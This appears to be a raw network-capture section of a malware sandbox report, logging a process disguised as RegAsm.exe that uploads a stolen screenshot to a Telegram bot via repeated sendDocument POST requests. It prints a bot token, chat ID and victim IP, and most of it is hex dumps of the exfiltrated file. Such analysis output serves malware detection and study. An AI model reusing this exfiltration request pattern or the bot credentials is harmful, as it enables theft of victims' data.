                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:15 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:15 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.449935149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:16 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3a59757f29ad
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695479
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 61 35 39 37 35 37 66 32 39 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3a59757f29adContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:16 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:17 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:17 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.449952149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:19 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3bdbb7a119f5
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695479
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 62 64 62 62 37 61 31 31 39 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3bdbb7a119f5Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
